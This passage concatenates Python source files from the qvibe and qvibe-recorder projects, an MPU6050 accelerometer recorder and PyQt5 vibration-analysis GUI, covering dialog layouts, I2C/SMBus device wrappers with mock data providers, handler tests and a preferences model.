curve_idx = idx
curve_data = x
elif new_delta > delta:
break
return curve_data, curve_idx
def on_update(self, type, **kwargs):
'''
handles measurement model changes
If event type is activation toggle then changes the associated curve visibility.
If event type is analysis change then the model is marked for refresh.
:param idx: the measurement idx.
'''
if type == LOAD_MEASUREMENTS:
self.__refresh_data = True
elif type == CLEAR_MEASUREMENTS:
self.clear()
def clear(self, draw=True):
'''
clears the graph.
'''
self.stop_animation()
self.__axes.clear()
self.__pressure_curve = None
format_axes_dbfs_hz(self.__axes)
if draw:
self._chart.canvas.draw_idle()
def stop_animation(self):
'''
Stops the animation.
'''
if self.__ani is not None:
logger.info(f"Stopping animation in {self.name}")
ani = self.__ani
self.__ani = None
self.__refresh_data = True
ani._stop()
```
#### File: python/ui/display.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_displayControlsDialog(object):
def setupUi(self, displayControlsDialog):
displayControlsDialog.setObjectName("displayControlsDialog")
displayControlsDialog.resize(302, 188)
self.gridLayout = QtWidgets.QGridLayout(displayControlsDialog)
self.gridLayout.setObjectName("gridLayout")
self.buttonBox = QtWidgets.QDialogButtonBox(displayControlsDialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Apply|QtWidgets.QDialogButtonBox.Close)
self.buttonBox.setObjectName("buttonBox")
self.gridLayout.addWidget(self.buttonBox, 1, 0, 1, 1)
self.formLayout = QtWidgets.QFormLayout()
self.formLayout.setObjectName("formLayout")
self.colourSchemeLabel = QtWidgets.QLabel(displayControlsDialog)
self.colourSchemeLabel.setObjectName("colourSchemeLabel")
self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.colourSchemeLabel)
self.colourMapSelector = QtWidgets.QComboBox(displayControlsDialog)
self.colourMapSelector.setObjectName("colourMapSelector")
self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.colourMapSelector)
self.decibelRangeLabel = QtWidgets.QLabel(displayControlsDialog)
self.decibelRangeLabel.setObjectName("decibelRangeLabel")
self.formLayout.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.decibelRangeLabel)
self.yAxisRange = QtWidgets.QSpinBox(displayControlsDialog)
self.yAxisRange.setMinimum(10)
self.yAxisRange.setMaximum(120)
self.yAxisRange.setSingleStep(5)
self.yAxisRange.setProperty("value", 60)
self.yAxisRange.setObjectName("yAxisRange")
self.formLayout.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.yAxisRange)
self.normaliseCheckBox = QtWidgets.QCheckBox(displayControlsDialog)
self.normaliseCheckBox.setObjectName("normaliseCheckBox")
self.formLayout.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.normaliseCheckBox)
self.normalisationAngleLabel = QtWidgets.QLabel(displayControlsDialog)
self.normalisationAngleLabel.setObjectName("normalisationAngleLabel")
self.formLayout.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.normalisationAngleLabel)
self.normalisationAngle = QtWidgets.QComboBox(displayControlsDialog)
self.normalisationAngle.setObjectName("normalisationAngle")
self.normalisationAngle.addItem("")
self.formLayout.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.normalisationAngle)
self.polarRangeLabel = QtWidgets.QLabel(displayControlsDialog)
self.polarRangeLabel.setObjectName("polarRangeLabel")
self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.polarRangeLabel)
self.polarRange = QtWidgets.QCheckBox(displayControlsDialog)
self.polarRange.setObjectName("polarRange")
self.formLayout.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.polarRange)
self.gridLayout.addLayout(self.formLayout, 0, 0, 1, 1)
self.retranslateUi(displayControlsDialog)
self.buttonBox.accepted.connect(displayControlsDialog.accept)
self.buttonBox.rejected.connect(displayControlsDialog.reject)
QtCore.QMetaObject.connectSlotsByName(displayControlsDialog)
def retranslateUi(self, displayControlsDialog):
_translate = QtCore.QCoreApplication.translate
displayControlsDialog.setWindowTitle(_translate("displayControlsDialog", "Display"))
self.colourSchemeLabel.setText(_translate("displayControlsDialog", "Colour Scheme"))
self.decibelRangeLabel.setText(_translate("displayControlsDialog", "Y Range"))
self.yAxisRange.setSuffix(_translate("displayControlsDialog", "dB"))
self.normaliseCheckBox.setText(_translate("displayControlsDialog", "Normalise?"))
self.normalisationAngleLabel.setText(_translate("displayControlsDialog", "Normalisation Angle"))
self.normalisationAngle.setItemText(0, _translate("displayControlsDialog", "0"))
self.polarRangeLabel.setText(_translate("displayControlsDialog", "Polar Range"))
self.polarRange.setText(_translate("displayControlsDialog", "+/- 180?"))
```
#### File: python/ui/savechart.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_saveChartDialog(object):
def setupUi(self, saveChartDialog):
saveChartDialog.setObjectName("saveChartDialog")
saveChartDialog.setWindowModality(QtCore.Qt.ApplicationModal)
saveChartDialog.resize(259, 155)
saveChartDialog.setModal(True)
self.gridLayout = QtWidgets.QGridLayout(saveChartDialog)
self.gridLayout.setObjectName("gridLayout")
self.formLayout = QtWidgets.QFormLayout()
self.formLayout.setObjectName("formLayout")
self.widthPixels = QtWidgets.QSpinBox(saveChartDialog)
self.widthPixels.setMinimum(1)
self.widthPixels.setMaximum(8192)
self.widthPixels.setObjectName("widthPixels")
self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.widthPixels)
self.heightPixels = QtWidgets.QSpinBox(saveChartDialog)
self.heightPixels.setEnabled(False)
self.heightPixels.setMinimum(1)
self.heightPixels.setMaximum(8192)
self.heightPixels.setObjectName("heightPixels")
self.formLayout.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.heightPixels)
self.label = QtWidgets.QLabel(saveChartDialog)
self.label.setObjectName("label")
self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.label)
self.label_2 = QtWidgets.QLabel(saveChartDialog)
self.label_2.setObjectName("label_2")
self.formLayout.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.label_2)
self.gridLayout.addLayout(self.formLayout, 0, 0, 1, 1)
self.buttonBox = QtWidgets.QDialogButtonBox(saveChartDialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Save)
self.buttonBox.setObjectName("buttonBox")
self.gridLayout.addWidget(self.buttonBox, 1, 0, 1, 1)
self.retranslateUi(saveChartDialog)
self.buttonBox.accepted.connect(saveChartDialog.accept)
self.buttonBox.rejected.connect(saveChartDialog.reject)
self.widthPixels.valueChanged['int'].connect(saveChartDialog.updateHeight)
QtCore.QMetaObject.connectSlotsByName(saveChartDialog)
def retranslateUi(self, saveChartDialog):
_translate = QtCore.QCoreApplication.translate
saveChartDialog.setWindowTitle(_translate("saveChartDialog", "Save Chart"))
self.label.setText(_translate("saveChartDialog", "Width"))
self.label_2.setText(_translate("saveChartDialog", "Height"))
``` |
{
"source": "3ll3d00d/qvibe-recorder",
"score": 3
} |
#### File: qvibe-recorder/qvibe/accelerometer.py
```python
import abc
import logging
import time
from qvibe.handler import Discard, ERROR
NAME = 'name'
FS = 'fs'
SAMPLE_IDX = 'idx'
ZERO_TIME = 'zt'
ACCEL_X = 'ac_x'
ACCEL_Y = 'ac_y'
ACCEL_Z = 'ac_z'
GYRO_X = 'gy_x'
GYRO_Y = 'gy_y'
GYRO_Z = 'gy_z'
TEMP = 'temp'
logger = logging.getLogger(__name__)
class Accelerometer:
"""
A simple base class to represent an accelerometer, exists to enable the system to be tested in the absence of a
physical device.
"""
def __init__(self, fs=None, samples_per_batch=None, data_handler=None):
"""
Initialises the accelerometer to use a default sample rate of 500Hz, a samplesPerBatch that accommodates 1/4s
worth of data and a dataHandler function that simply logs data to the screen.
:param: fs: the sample rate
:param: samplesPerBatch: the number of samples that each provideData block should yield.
:param: dataHandler: a function that accepts the data produced by initialiseDevice and does something with it.
"""
if fs is None:
self.fs = 500
else:
self.fs = fs
if samples_per_batch is None:
self.samples_per_batch = self.fs / 4
else:
self.samples_per_batch = samples_per_batch
if data_handler is None:
self.data_handler = Discard()
else:
self.data_handler = data_handler
self.__last_overflow = None
def run(self):
while True:
logger.warning("Running")
if self.do_init() is True:
self.record()
else:
time.sleep(1)
def do_init(self):
try:
logger.info("Initialising device")
self.initialise_device()
logger.info("Initialisation complete")
return True
except Exception as e:
logger.exception("Initialisation failed")
self.data_handler.on_init_fail(time.time(), str(e))
return False
def record(self):
try:
while True:
self.data_handler.handle(self.provide_data())
except Exception as e:
logger.exception('Unexpected exception during record loop')
self.data_handler.handle(ERROR)
@abc.abstractmethod
def provide_data(self):
"""
reads the underlying device to provide a batch of raw data.
:return: a list of data where each item is a single sample of data converted into real values and stored as a
dict.
"""
pass
@abc.abstractmethod
def initialise_device(self):
"""
initialises the underlying device
"""
pass
```
#### File: qvibe-recorder/qvibe/app.py
```python
import faulthandler
import logging
import threading
from twisted.internet.endpoints import TCP4ServerEndpoint
from qvibe.config import Config
from qvibe.handler import AsyncHandler
from qvibe.i2cio import WhiteNoiseProvider, mockIO, smbusIO, WavProvider
from qvibe.interface import CommandFactory
from qvibe.mpu6050 import mpu6050
from twisted.internet import reactor
logger = logging.getLogger(__name__)
# register a thread dumper
faulthandler.enable()
if hasattr(faulthandler, 'register'):
import signal
faulthandler.register(signal.SIGUSR2, all_threads=True)
def create_device(device_cfg):
"""
Creates a measurement device from the input configuration.
:param: device_cfg: the device cfg.
:return: the constructed device.
"""
io_cfg = device_cfg['io']
device_type = device_cfg['type']
if device_type == 'mpu6050':
fs = device_cfg.get('fs')
name = device_cfg.get('name', 'mpu6050')
if io_cfg['type'] == 'mock':
provider = io_cfg.get('provider')
if provider is not None:
if provider == 'white noise':
data_provider = WhiteNoiseProvider()
elif provider == 'dbl':
data_provider = WavProvider(io_cfg.get('file'))
else:
raise ValueError(provider + " is not a supported mock io data provider")
else:
raise ValueError('No provider supplied for a mock io data provider')
logger.warning(f"Loading {provider} mock data provider for mpu6050")
io = mockIO(data_provider=data_provider.provide)
elif io_cfg['type'] == 'smbus':
bus_id = io_cfg['busId']
logger.warning("Loading smbus %d", bus_id)
io = smbusIO(bus_id)
else:
raise ValueError(io_cfg['type'] + " is not a supported io provider")
logger.warning(f"Loading mpu6050 {name}/{fs}")
samples_per_batch = int(device_cfg['samplesPerBatch']) if 'samplesPerBatch' in device_cfg else None
mpu = mpu6050(io, name=name, fs=fs, data_handler=AsyncHandler(), self_test=True,
samples_per_batch=samples_per_batch)
worker = threading.Thread(target=mpu.run, daemon=True)
worker.start()
return mpu
else:
raise ValueError(device_type + " is not a supported device")
def run(args=None):
""" The main routine. """
cfg = Config()
cfg.configure_logger()
devices = {device.name: device for device in [create_device(c) for c in cfg.config['accelerometers']]}
endpoint = TCP4ServerEndpoint(reactor, cfg.port)
logger.info(f"Listening on port {cfg.port}")
endpoint.listen(CommandFactory(devices))
reactor.run()
if __name__ == '__main__':
run()
```
#### File: qvibe-recorder/qvibe/i2cio.py
```python
import abc
from queue import Queue
from qvibe.mpu6050 import mpu6050
class i2cIO(object):
"""
A thin wrapper on the smbus for reading and writing data. Exists to allow unit testing without a real device
connected.
"""
def __init__(self):
pass
"""
Writes data to the device.
:param: i2c_address: the address to write to.
:param: register: the location to write to.
:param: val: the value to write.
"""
@abc.abstractmethod
def write(self, i2c_address, register, val):
pass
"""
Reads data from the device.
:param: i2c_address: the address to read from.
:param: register: the register to read from.
:return: the data read.
"""
@abc.abstractmethod
def read(self, i2c_address, register):
pass
"""
Reads a block of data from the device.
:param: i2c_address: the address to read from.
:param: register: the register to read from.
:param: length: no of bytes to read.
:return: the data read.
"""
@abc.abstractmethod
def read_block(self, i2c_address, register, length):
pass
class mockIO(i2cIO):
def __init__(self, data_provider=None):
super().__init__()
self.values_written = []
self.data_provider = data_provider
self.vals_to_read = Queue()
def write(self, i2c_address, register, val):
self.values_written.append([i2c_address, register, val])
def read_block(self, i2c_address, register, length):
if self.data_provider is not None:
ret = self.data_provider(register, length)
if ret is not None:
return ret
return self.vals_to_read.get_nowait()
def read(self, i2c_address, register):
if self.data_provider is not None:
ret = self.data_provider(register)
if ret is not None:
return ret
return self.vals_to_read.get_nowait()
class MockIoDataProvider:
def __init__(self, samples):
self.idx = 0
self.samples = samples
def provide(self, register, length=None):
if register is mpu6050.MPU6050_RA_INT_STATUS:
return 0x01
elif register is mpu6050.MPU6050_RA_FIFO_COUNTH:
# always 36 bytes
return [0b00000000, 0b00100100]
elif register is mpu6050.MPU6050_RA_FIFO_R_W:
to_read = length // 6
bytes = bytearray()
for i in range(0, to_read):
self.add_value(bytes, 'x')
self.add_value(bytes, 'y')
self.add_value(bytes, 'z')
self.idx += 1
from time import sleep
sleep(0.002 * to_read)
return bytes
else:
if length is None:
return 0b00000000
else:
return [x.to_bytes(1, 'big') for x in range(length)]
def add_value(self, bytes, key):
samples = self.samples[key]
sample_val = samples[self.idx % len(samples)]
val = self.convert_value(sample_val)
try:
b = bytearray(val.to_bytes(2, 'big'))
except OverflowError:
print("Value too big - " + str(val) + " - replacing with 0")
val = 0
b = bytearray(val.to_bytes(2, 'big'))
bytes.extend(b)
def convert_value(self, val):
i = int((val * 32768))
return i if i >= 0 else 65536 + i
class ModulatedNoiseProvider(MockIoDataProvider):
def __init__(self):
import random
super().__init__({
'x': [random.gauss(0, 0.25) for _ in range(0, 1000)],
'y': [random.gauss(0, 0.25) for _ in range(0, 1000)],
'z': [random.gauss(0, 0.25) for _ in range(0, 1000)]
})
class WhiteNoiseProvider(MockIoDataProvider):
def __init__(self):
import random
super().__init__({
'x': [random.gauss(0, 0.25) for _ in range(0, 1000)],
'y': [random.gauss(0, 0.25) for _ in range(0, 1000)],
'z': [random.gauss(0, 0.25) for _ in range(0, 1000)]
})
class WavProvider(MockIoDataProvider):
'''
Reads data created from a wav file as per
f.write(struct.pack('d'*len(data), *data))
'''
def __init__(self, file):
import struct
import os
sz = os.stat(file).st_size
if sz % 8 != 0:
raise ValueError(f"File size is {sz}, can't be a dbl file")
with open(file, mode='rb') as f:
data = list(struct.unpack('d' * int(sz / 8), f.read(sz)))
if data is not None:
super().__init__({
'x': data,
'y': data,
'z': data
})
class smbusIO(i2cIO):
"""
an implementation of i2c_io which talks over the smbus.
"""
def __init__(self, bus_id=1):
super().__init__()
from smbus2 import SMBus
self.bus = SMBus(bus=bus_id)
def write(self, i2c_address, register, val):
"""
Delegates to smbus.write_byte_data
"""
return self.bus.write_byte_data(i2c_address, register, val)
def read(self, i2c_address, register):
"""
Delegates to smbus.read_byte_data
"""
return self.bus.read_byte_data(i2c_address, register)
def read_block(self, i2c_address, register, length):
"""
Delegates to smbus.read_i2c_block_data
"""
return self.bus.read_i2c_block_data(i2c_address, register, length)
```
#### File: qvibe/test/test_handler.py
```python
import os
import shutil
import time
from qvibe.handler import DataHandler, AsyncHandler, CSVLogger
class MyHandler(DataHandler):
def __init__(self):
self.event_time = None
self.events = []
self.message = None
def on_init_fail(self, event_time, message):
self.event_time = event_time
self.message = message
def handle(self, data):
self.events.append(data)
def test_async_handles_all_events():
logger = MyHandler()
async_handler = AsyncHandler(delegate=logger)
do_loop(async_handler)
time.sleep(0.5)
assert len(logger.events) == 100
for i in range(0, 100):
assert logger.events[i] == make_event(i)
def do_loop(handler, use_list_vals=False):
for i in range(0, 100):
handler.handle(make_event(i, use_list_vals))
handler.on_init_fail(time.time(), "endtest")
def make_event(i, use_list_vals=False):
import collections
dict = collections.OrderedDict()
dict["d"] = "d" + str(i)
dict["b"] = "b" + str(i)
if use_list_vals:
return [list(dict.values())]
else:
return [dict]
def test_csvWritesEachRowToFile(tmpdir):
output_dir = setupCsv(tmpdir)
logger = CSVLogger('owner', output_dir)
do_loop(logger)
verifyCsv(tmpdir)
def test_csvWritesEachRowToFileWhenAcceptingValues(tmpdir):
output_dir = setupCsv(tmpdir)
logger = CSVLogger('owner', output_dir)
do_loop(logger, True)
verifyCsv(tmpdir, True)
def test_csvWritesEachRowToFileWhenAsync(tmpdir):
output_dir = setupCsv(tmpdir)
logger = CSVLogger('owner', output_dir)
async_handler = AsyncHandler(logger)
do_loop(async_handler)
time.sleep(0.5)
verifyCsv(tmpdir)
def setupCsv(tmpdir):
output_dir = os.path.join(tmpdir, "test")
if os.path.exists(output_dir):
shutil.rmtree(output_dir)
os.makedirs(output_dir)
return output_dir
def verifyCsv(tmpdir, use_list_vals=False):
output_file = os.path.join(tmpdir, "test", 'owner', 'data.out')
assert os.path.exists(output_file)
with open(output_file) as f:
lines = f.read().splitlines()
if use_list_vals is True:
assert len(lines) == 100
for i in range(0, 100):
assert lines[i] == "d" + str(i) + ",b" + str(i)
else:
assert len(lines) == 101
assert lines[0] == "d,b"
for i in range(0, 100):
assert lines[i + 1] == "d" + str(i) + ",b" + str(i)
``` |
{
"source": "3ll3d00d/qvibe",
"score": 2
} |
#### File: python/model/preferences.py
```python
import os
import numpy as np
import qtawesome as qta
from qtpy.QtCore import Qt
from qtpy.QtWidgets import QDialog, QMessageBox, QDialogButtonBox, QFileDialog
from common import parse_file, np_to_str
from ui.preferences import Ui_preferencesDialog
DISPLAY_SMOOTH_GRAPHS = 'display/smooth_graphs'
STYLE_MATPLOTLIB_THEME_DEFAULT = 'beq_dark'
STYLE_MATPLOTLIB_THEME = 'style/matplotlib_theme'
LOGGING_LEVEL = 'logging/level'
SCREEN_GEOMETRY = 'screen/geometry'
SCREEN_WINDOW_STATE = 'screen/window_state'
SYSTEM_CHECK_FOR_UPDATES = 'system/check_for_updates'
SYSTEM_CHECK_FOR_BETA_UPDATES = 'system/check_for_beta_updates'
RECORDER_TARGET_FS = 'recorder/target/fs'
RECORDER_TARGET_SAMPLES_PER_BATCH = 'recorder/target/samples_per_batch'
RECORDER_TARGET_ACCEL_ENABLED = 'recorder/target/accel_enabled'
RECORDER_TARGET_ACCEL_SENS = 'recorder/target/accel_sens'
RECORDER_TARGET_GYRO_ENABLED = 'recorder/target/gyro_enabled'
RECORDER_TARGET_GYRO_SENS = 'recorder/target/gyro_sens'
RECORDER_SAVED_IPS = 'recorder/saved_ips'
BUFFER_SIZE = 'buffer/size'
ANALYSIS_RESOLUTION = 'analysis/resolution'
ANALYSIS_TARGET_FS = 'analysis/target_fs'
ANALYSIS_WINDOW_DEFAULT = 'Default'
ANALYSIS_AVG_WINDOW = 'analysis/avg_window'
ANALYSIS_PEAK_WINDOW = 'analysis/peak_window'
ANALYSIS_DETREND = 'analysis/detrend'
ANALYSIS_HPF_RTA = 'analysis/hpfrta'
CHART_MAG_MIN = 'chart/mag_min'
CHART_MAG_MAX = 'chart/mag_max'
CHART_FREQ_MIN = 'chart/freq_min'
CHART_FREQ_MAX = 'chart/freq_max'
CHART_SPECTRO_SCALE_FACTOR = 'chart/spectro/scale_factor'
CHART_SPECTRO_SCALE_ALGO = 'chart/spectro/scale_algo'
SUM_X_SCALE = 'sum/x_scale'
SUM_Y_SCALE = 'sum/y_scale'
SUM_Z_SCALE = 'sum/z_scale'
WAV_DOWNLOAD_DIR = 'wav/download_dir'
SNAPSHOT_GROUP = 'snapshot'
RTA_TARGET = 'rta/target'
RTA_HOLD_SECONDS = 'rta/hold_secs'
RTA_SMOOTH_WINDOW = 'rta/smooth_window'
RTA_SMOOTH_POLY = 'rta/smooth_poly'
DEFAULT_PREFS = {
ANALYSIS_RESOLUTION: 1.0,
ANALYSIS_TARGET_FS: 1000,
ANALYSIS_AVG_WINDOW: ANALYSIS_WINDOW_DEFAULT,
ANALYSIS_PEAK_WINDOW: ANALYSIS_WINDOW_DEFAULT,
ANALYSIS_DETREND: 'constant',
ANALYSIS_HPF_RTA: False,
BUFFER_SIZE: 30,
CHART_MAG_MIN: 40,
CHART_MAG_MAX: 120,
CHART_FREQ_MIN: 1,
CHART_FREQ_MAX: 125,
CHART_SPECTRO_SCALE_FACTOR: '8x',
CHART_SPECTRO_SCALE_ALGO: 'Lanczos',
DISPLAY_SMOOTH_GRAPHS: True,
RECORDER_TARGET_FS: 500,
RECORDER_TARGET_SAMPLES_PER_BATCH: 8,
RECORDER_TARGET_ACCEL_ENABLED: True,
RECORDER_TARGET_ACCEL_SENS: 4,
RECORDER_TARGET_GYRO_ENABLED: False,
RECORDER_TARGET_GYRO_SENS: 500,
RTA_HOLD_SECONDS: 10.0,
RTA_SMOOTH_WINDOW: 31,
RTA_SMOOTH_POLY: 7,
SUM_X_SCALE: 2.2,
SUM_Y_SCALE: 2.4,
SUM_Z_SCALE: 1.0,
STYLE_MATPLOTLIB_THEME: STYLE_MATPLOTLIB_THEME_DEFAULT,
SYSTEM_CHECK_FOR_UPDATES: True,
SYSTEM_CHECK_FOR_BETA_UPDATES: False,
WAV_DOWNLOAD_DIR: os.path.join(os.path.expanduser('~'), 'Music'),
}
TYPES = {
ANALYSIS_RESOLUTION: float,
ANALYSIS_TARGET_FS: int,
ANALYSIS_HPF_RTA: bool,
BUFFER_SIZE: int,
CHART_MAG_MIN: int,
CHART_MAG_MAX: int,
CHART_FREQ_MIN: int,
CHART_FREQ_MAX: int,
DISPLAY_SMOOTH_GRAPHS: bool,
RECORDER_TARGET_FS: int,
RECORDER_TARGET_SAMPLES_PER_BATCH: int,
RECORDER_TARGET_ACCEL_ENABLED: bool,
RECORDER_TARGET_ACCEL_SENS: int,
RECORDER_TARGET_GYRO_ENABLED: bool,
RECORDER_TARGET_GYRO_SENS: int,
RTA_HOLD_SECONDS: float,
RTA_SMOOTH_POLY: int,
RTA_SMOOTH_WINDOW: int,
SUM_X_SCALE: float,
SUM_Y_SCALE: float,
SUM_Z_SCALE: float,
SYSTEM_CHECK_FOR_UPDATES: bool,
SYSTEM_CHECK_FOR_BETA_UPDATES: bool,
}
singleton = None
class Preferences:
def __init__(self, settings):
self.__settings = settings
global singleton
singleton = self
def has(self, key):
'''
checks for existence of a value.
:param key: the key.
:return: True if we have a value.
'''
return self.get(key) is not None
def get(self, key, default_if_unset=True):
'''
Gets the value, if any.
:param key: the settings key.
:param default_if_unset: if true, return a default value.
:return: the value.
'''
default_value = DEFAULT_PREFS.get(key, None) if default_if_unset is True else None
value_type = TYPES.get(key, None)
if value_type is not None:
return self.__settings.value(key, defaultValue=default_value, type=value_type)
else:
return self.__settings.value(key, defaultValue=default_value)
def enter(self, key):
self.__settings.beginGroup(key)
def get_children(self):
return self.__settings.childKeys()
def get_child_groups(self):
return self.__settings.childGroups()
def exit(self):
self.__settings.endGroup()
def get_all(self, prefix):
'''
Get all values with the given prefix.
:param prefix: the prefix.
:return: the values, if any.
'''
self.__settings.beginGroup(prefix)
try:
return set(filter(None.__ne__, [self.__settings.value(x) for x in self.__settings.childKeys()]))
finally:
self.__settings.endGroup()
def set(self, key, value):
'''
sets a new value.
:param key: the key.
:param value: the value.
'''
if value is None:
self.__settings.remove(key)
else:
self.__settings.setValue(key, value)
def clear_all(self, prefix):
''' clears all under the given group '''
self.__settings.beginGroup(prefix)
self.__settings.remove('')
self.__settings.endGroup()
def clear(self, key):
'''
Removes the stored value.
:param key: the key.
'''
self.set(key, None)
def reset(self):
'''
Resets all preferences.
'''
self.__settings.clear()
class PreferencesDialog(QDialog, Ui_preferencesDialog):
'''
Allows user to set some basic preferences.
'''
def __init__(self, preferences, style_root, recorder_store, spectro, parent=None):
super(PreferencesDialog, self).__init__(parent)
self.__style_root = style_root
self.__recorder_store = recorder_store
self.setupUi(self)
self.__preferences = preferences
self.__spectro = spectro
self.__should_clear_target = False
self.__new_target = None
self.buttonBox.button(QDialogButtonBox.RestoreDefaults).clicked.connect(self.__reset)
self.checkForUpdates.setChecked(self.__preferences.get(SYSTEM_CHECK_FOR_UPDATES))
self.checkForBetaUpdates.setChecked(self.__preferences.get(SYSTEM_CHECK_FOR_BETA_UPDATES))
self.xScale.setValue(self.__preferences.get(SUM_X_SCALE))
self.yScale.setValue(self.__preferences.get(SUM_Y_SCALE))
self.zScale.setValue(self.__preferences.get(SUM_Z_SCALE))
self.magMin.setValue(self.__preferences.get(CHART_MAG_MIN))
self.magMax.setValue(self.__preferences.get(CHART_MAG_MAX))
self.highpassRTA.setChecked(self.__preferences.get(ANALYSIS_HPF_RTA))
self.init_combo(ANALYSIS_DETREND, self.detrend, lambda a: f"{a[0].upper()}{a[1:]}")
self.magMin.valueChanged['int'].connect(self.__balance_mag)
self.magMax.valueChanged['int'].connect(self.__balance_mag)
self.freqMin.setValue(self.__preferences.get(CHART_FREQ_MIN))
self.freqMax.setValue(self.__preferences.get(CHART_FREQ_MAX))
self.freqMin.valueChanged['int'].connect(self.__balance_freq)
self.freqMax.valueChanged['int'].connect(self.__balance_freq)
self.wavSaveDir.setText(self.__preferences.get(WAV_DOWNLOAD_DIR))
self.spectroScaleAlgo.setCurrentText(self.__preferences.get(CHART_SPECTRO_SCALE_ALGO))
self.spectroScaleFactor.setCurrentText(self.__preferences.get(CHART_SPECTRO_SCALE_FACTOR))
self.wavSaveDirPicker.setIcon(qta.icon('fa5s.folder-open'))
self.addRecorderButton.setIcon(qta.icon('fa5s.plus'))
self.deleteRecorderButton.setIcon(qta.icon('fa5s.times'))
enable_delete = False
if self.__preferences.get(RECORDER_SAVED_IPS) is not None:
ips = self.__preferences.get(RECORDER_SAVED_IPS).split('|')
for ip in ips:
self.recorders.addItem(ip)
enable_delete = True
else:
self.recorderIP.setFocus(Qt.OtherFocusReason)
self.deleteRecorderButton.setEnabled(enable_delete)
self.addRecorderButton.setEnabled(False)
self.__reset_target_buttons()
self.clearTarget.setIcon(qta.icon('fa5s.times', color='red'))
self.loadTarget.setIcon(qta.icon('fa5s.folder-open'))
self.createTarget.setIcon(qta.icon('fa5s.bezier-curve'))
self.createTarget.setToolTip('Draw a target curve')
self.createTarget.clicked.connect(self.__create_target)
def __reset_target_buttons(self):
has_target = self.__preferences.has(RTA_TARGET)
self.clearTarget.setEnabled(has_target)
self.targetSet.setChecked(has_target)
def __create_target(self):
from model.target import CreateTargetDialog
dialog = CreateTargetDialog(self, self.__preferences, fs=self.__preferences.get(RECORDER_TARGET_FS))
dialog.exec()
self.__reset_target_buttons()
def __balance_mag(self, val):
keep_range(self.magMin, self.magMax, 10)
def __balance_freq(self, val):
keep_range(self.freqMin, self.freqMax, 10)
def validate_ip(self, ip):
valid_ip = self.__is_valid_ip(ip)
existing_ip = self.recorders.findText(ip, Qt.MatchExactly)
self.addRecorderButton.setEnabled(valid_ip and existing_ip == -1)
def add_recorder(self):
self.recorders.addItem(self.recorderIP.text())
self.recorderIP.clear()
def delete_recorder(self):
idx = self.recorders.currentIndex()
if idx > -1:
self.recorders.removeItem(idx)
self.deleteRecorderButton.setEnabled(self.recorders.count() > 0)
def clear_target(self):
'''
Clears any RTA target.
'''
self.__should_clear_target = True
self.__new_target = None
self.targetSet.setChecked(False)
def load_target(self):
'''
Allows user to select an FRD file to set the target.
'''
parsers = {'frd': self.__parse_frd, 'txt': self.__parse_frd}
_, data = parse_file('FRD (*.frd *.txt)', 'Load Target', parsers)
self.__new_target = data
self.targetSet.setChecked(data is not None)
@staticmethod
def __is_valid_ip(ip):
''' checks if the string is a valid ip:port. '''
tokens = ip.split(':')
if len(tokens) == 2:
ip_tokens = tokens[0].split('.')
if len(ip_tokens) == 4:
try:
first, *nums = [int(i) for i in ip_tokens]
if 0 < first <= 255:
if all(0 <= i <= 255 for i in nums):
return 0 < int(tokens[1]) < 65536
except Exception as e:
pass
return False
def __reset(self):
'''
Reset all settings
'''
result = QMessageBox.question(self,
'Reset Preferences?',
f"All preferences will be restored to their default values. This action is irreversible.\nAre you sure you want to continue?",
QMessageBox.Yes | QMessageBox.No,
QMessageBox.No)
if result == QMessageBox.Yes:
self.__preferences.reset()
self.alert_on_change('Defaults Restored')
self.reject()
def init_combo(self, key, combo, translater=lambda a: a):
'''
Initialises a combo box from either settings or a default value.
:param key: the settings key.
:param combo: the combo box.
:param translater: a lambda to translate from the stored value to the display name.
'''
stored_value = self.__preferences.get(key)
idx = -1
if stored_value is not None:
idx = combo.findText(translater(stored_value))
if idx != -1:
combo.setCurrentIndex(idx)
def accept(self):
'''
Saves the locations if they exist.
'''
self.__preferences.set(SYSTEM_CHECK_FOR_UPDATES, self.checkForUpdates.isChecked())
self.__preferences.set(SYSTEM_CHECK_FOR_BETA_UPDATES, self.checkForBetaUpdates.isChecked())
self.__preferences.set(SUM_X_SCALE, self.xScale.value())
self.__preferences.set(SUM_Y_SCALE, self.yScale.value())
self.__preferences.set(SUM_Z_SCALE, self.zScale.value())
self.__preferences.set(WAV_DOWNLOAD_DIR, self.wavSaveDir.text())
self.__preferences.set(CHART_MAG_MIN, self.magMin.value())
self.__preferences.set(CHART_MAG_MAX, self.magMax.value())
self.__preferences.set(CHART_FREQ_MIN, self.freqMin.value())
self.__preferences.set(CHART_FREQ_MAX, self.freqMax.value())
self.__preferences.set(CHART_SPECTRO_SCALE_ALGO, self.spectroScaleAlgo.currentText())
self.__preferences.set(CHART_SPECTRO_SCALE_FACTOR, self.spectroScaleFactor.currentText())
self.__preferences.set(ANALYSIS_DETREND, self.detrend.currentText().lower())
self.__preferences.set(ANALYSIS_HPF_RTA, self.highpassRTA.isChecked())
# TODO would be nicer to be able to listen to specific values
self.__spectro.update_scale()
if self.recorders.count() > 0:
ips = [self.recorders.itemText(i) for i in range(self.recorders.count())]
self.__preferences.set(RECORDER_SAVED_IPS, '|'.join(ips))
self.__recorder_store.load(ips)
else:
self.__preferences.clear(RECORDER_SAVED_IPS)
self.__recorder_store.clear()
if self.__should_clear_target is True:
self.__preferences.clear(RTA_TARGET)
if self.__new_target is not None:
self.__preferences.set(RTA_TARGET, self.__new_target)
QDialog.accept(self)
def pick_save_dir(self):
